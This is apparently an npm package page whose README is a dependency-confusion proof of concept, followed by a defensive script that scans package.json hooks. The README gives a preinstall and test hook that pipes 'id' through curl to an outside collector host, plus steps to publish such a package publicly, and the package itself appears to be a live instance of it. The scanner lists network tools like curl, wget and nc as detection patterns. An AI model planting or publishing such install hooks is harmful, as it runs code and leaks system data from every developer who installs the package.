2.0.0 • Published 2 months ago
datamodel.core.dm v2.0.0
NPM Dependency Confusion PoC
Create a package called 'yourpackage'.
Insert the payload you want to run into the "scripts" section of package.json:
  "scripts": {
    "test": "id | curl -X POST -d @- https://xxx.oastify.com/poc",
    "preinstall": "id | curl -X POST -d @- https://xxx.oastify.com/poc"
  },
Log in to npm
» npm login
npm notice Log in on https://registry.npmjs.org/
Username: username
Password:
Email: (this IS public) foo.bar@foobar.com
npm notice Please use the one-time password (OTP) from your authenticator application
Enter one-time password: XXXXXX
Logged in as username on https://registry.npmjs.org/
Publish the package
» npm publish --access public
npm notice
...
npm notice Publishing to https://registry.npmjs.org/
This operation requires a one-time password.
Enter OTP: XXXXXX
+ yourpackage@1.0.0
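
On the defender's side, the preinstall hook from the package.json step above is the thing to look for before a package is installed. The check below is an added example, not part of the original package or its README; the pattern list, the function name and the sample manifest (with a placeholder host) are constructed assumptions.

```javascript
// Added example: flag package.json scripts that reach the network or spawn
// a shell, and mark the ones npm runs automatically during `npm install`.
const AUTO_RUN_HOOKS = new Set(["preinstall", "install", "postinstall"]);

// Heuristic patterns (assumption: a starting list, tune for your environment).
const SUSPICIOUS = [
  { name: "network-client", re: /\b(curl|wget|nc|ncat)\b/i },
  { name: "inline-url", re: /https?:\/\//i },
  { name: "pipe-to-shell", re: /\|\s*(sh|bash|zsh)\b/i },
  { name: "encoded-payload", re: /\bbase64\b/i },
  { name: "inline-interpreter", re: /\b(node|python3?|perl)\s+-(e|c)\b/i },
];

// pkg is a parsed package.json object; returns one finding per flagged script.
function auditScripts(pkg) {
  const findings = [];
  for (const [hook, command] of Object.entries(pkg.scripts || {})) {
    if (typeof command !== "string") continue;
    const reasons = SUSPICIOUS.filter((p) => p.re.test(command)).map((p) => p.name);
    if (reasons.length === 0) continue;
    findings.push({ hook, autoRun: AUTO_RUN_HOOKS.has(hook), reasons, command });
  }
  // Install-time hooks first: they execute without any further user action.
  return findings.sort((a, b) => Number(b.autoRun) - Number(a.autoRun));
}

// Constructed sample with the same shape as the manifest on this page.
const SAMPLE = JSON.parse(`{
  "name": "yourpackage",
  "version": "1.0.0",
  "scripts": {
    "test": "id | curl -X POST -d @- https://collector.example.invalid/poc",
    "preinstall": "id | curl -X POST -d @- https://collector.example.invalid/poc",
    "build": "tsc -p ."
  }
}`);

for (const f of auditScripts(SAMPLE)) {
  const verdict = f.autoRun ? "BLOCK " : "REVIEW";
  console.log(`${verdict} ${f.hook}: ${f.reasons.join(",")} -> ${f.command}`);
}
```

Installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) keeps these hooks from executing while a flagged manifest is reviewed.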